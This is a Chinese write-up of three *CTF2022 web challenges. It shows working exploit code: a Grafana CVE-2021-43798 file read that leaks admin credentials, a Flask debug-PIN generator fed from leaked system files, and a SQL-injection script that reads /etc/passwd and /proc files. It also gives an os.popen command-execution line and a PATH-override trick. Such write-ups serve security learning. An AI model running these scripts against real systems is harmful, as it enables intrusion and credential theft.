概述
oh-my-grafana
Grafana是一款用Go语言开发的开源数据可视化工具,可以做数据监控和数据统计,带有告警功能。
本题使用的Grafana版本为8.2.6,存在任意文件读取的漏洞(CVE-2021-43798)
由于本题需要登录,首先考虑能不能读取到grafana.ini
,获取用户名和密码
在ini文件中搜索得到admin的用户名和密码,成功登录
[security]
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false
# default admin user, created on startup
admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = 5f989714e132c9b04d4807dafeb10ade
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
在ini文件中还可以找到使用的数据库为mysql,用户名密码都为grafana
# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = mysql
;host = mysql:3306
;name = grafana
;user = grafana
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
;password = grafana
连接mysql
flag就在数据库中
oh-my-notepro
任意用户名密码登陆后错误路径访问可以看到报错,且还是debug模式,我们可以从中获取python路径,在debug模式中使用控制台需要pin码解锁,于是可以考虑读文件来计算这台设备的pin码
3.8的pin码计算脚本如下,需要以下信息:
- username,用户名,可以读取
/etc/passwd
得到 - modname,默认值为flask.app
- appname,默认值为Flask
- moddir,flask库下app.py的绝对路径(报错得到)
- uuidnode,当前网络的mac地址的十进制数,通过文件
/sys/class/net/eth0/address
得到16进制结果,转化为10进制进行计算 - machine_id,docker机器id,读取
/etc/machine-id
,/proc/sys/kernel/random/boot_id
,/proc/self/cgroup
,前两个任选一个与最后一个拼接
#sha1
import hashlib
from itertools import chain
probably_public_bits = [
'root'# /etc/passwd
'flask.app',# 默认值
'Flask',# 默认值
'/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]
private_bits = [
'2485377581187',# /sys/class/net/eth0/address 16进制转10进制
#machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
'653dc458-4634-42b1-9a7a-b22a082e1fce55d22089f5fa429839d25dcea4675fb930c111da3bb774a6ab7349428589aefd'# /proc/self/cgroup
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
而且可以发现在/view?note_id=xxx
中存在sql注入,而且可以堆叠注入,于是考虑用load data local infile
来读取本地文件的信息存储在表中,再用union select 从表中读取数据
import requests
def show_tables():
payload="0' union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema='ctf'#"
data = {'note_id': payload}
try:
txt = s.get(url+'view', params=data).text
txt = txt.split('<p style="text-align: center">')[1].split('</p>')[0].strip()
print(txt)
except Exception as e:
print(e)
def load_data(filename,tablename):
payload=f"';create table if not exists {tablename}(data text);"
f"load data local infile '{filename}' into table {tablename};#"
data = {'note_id': payload}
s.get(url + 'view', params=data)
def read_table(tablename):
payload = f"0' union select 1,2,3,group_concat(data,'n'),5 from {tablename}#"
data = {'note_id': payload}
try:
txt = s.get(url + 'view', params=data).text
txt = txt.split('<p style="text-align: center">')[1].split('</p>')[0].strip()
print(txt)
except Exception as e:
print(e)
url = "http://192.168.1.27:5002/"
login_data = {
'username': "mac",
'password': "mac"
}
s=requests.session()
r = s.post(url=url+'login', data=login_data)
show_tables()
load_data('/proc/self/cgroup','a4')
read_table('a4')
show_tables()
'''
/etc/passwd
root:x:0:0:root:/root:/bin/bash
,daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
,bin:x:2:2:bin:/bin:/usr/sbin/nologin
,sys:x:3:3:sys:/dev:/usr/sbin/nologin
,sync:x:4:65534:sync:/bin:/bin/sync
,games:x:5:60:games:/usr/games:/usr/sbin/nologin
,man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
,lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
,mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
,news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
,uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
,proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
,www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
,backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
,list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
,irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
,gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
,nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
,_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
,ctf:x:1000:1000::/home/ctf:/bin/sh
,root:x:0:0:root:/root:/bin/bash
,daemon:x:1:1:d
/sys/class/net/eth0/address
02:42:ac:13:00:03
/etc/machine-id
96cec10d3d9307792745ec3b85c89620
/proc/sys/kernel/random/boot_id
b5ab2c33-deaa-45e0-b271-b3a7145f1dd3
/proc/self/cgroup
8104cff0b68712e4415efe7811acfd4fce16d2e90411d0d5e053df7a8e107a90
'''
获得了正确的PIN码后,进入控制台,用__import__("os").popen("cmd").read()
执行命令,拿到flag
oh-my-lotto
首先是md5截断比较,用脚本跑出结果拿到端口号
打开附件进行源码审计
elif request.method == 'POST':
flag = os.getenv('flag')
lotto_key = request.form.get('lotto_key') or ''
lotto_value = request.form.get('lotto_value') or ''
try:
lotto_key = lotto_key.upper()
except Exception as e:
print(e)
message = 'Lotto Error!'
return render_template('lotto.html', message=message)
if safe_check(lotto_key):
os.environ[lotto_key] = lotto_value
try:
os.system('wget --content-disposition -N lotto')
if os.path.exists("/app/lotto_result.txt"):
lotto_result = open("/app/lotto_result.txt", 'rb').read()
else:
lotto_result = 'result'
if os.path.exists("/app/guess/forecast.txt"):
forecast = open("/app/guess/forecast.txt", 'rb').read()
else:
forecast = 'forecast'
if forecast == lotto_result:
return flag
else:
message = 'Sorry forecast failed, maybe lucky next time!'
return render_template('lotto.html', message=message)
except Exception as e:
message = 'Lotto Error!'
return render_template('lotto.html', message=message)
else:
message = 'NO NO NO, JUST LOTTO!'
return render_template('lotto.html', message=message)
源码中提供一种方式通过lotto_key
和lotto_value
来修改环境变量的值,可以修改PATH为一个无效值,从而使wget报错,导致上一次的lotto_result不会改变,然后直接复制上一次的lotto结果传入即可
import requests
url = "http://121.36.217.177:53001/"
def lotto(key,value):
data = {"lotto_key": key,
"lotto_value": value}
txt=requests.post(url + "lotto",data=data).text
print(txt)
def getResult():
txt=requests.get(url+"result").text
p=txt.split("<p>")[-1].split("</p>")[0]
return p
lotto("","")
result= {"file":getResult()}
requests.post(url + "forecast",files=result)
lotto("PATH","xxxx")
#*ctf{its_forecast_0R_GUNICORN}
最后
以上就是欢喜花生为你收集整理的*CTF2022 - Weboh-my-grafanaoh-my-noteprooh-my-lotto的全部内容,希望文章能够帮你解决*CTF2022 - Weboh-my-grafanaoh-my-noteprooh-my-lotto所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复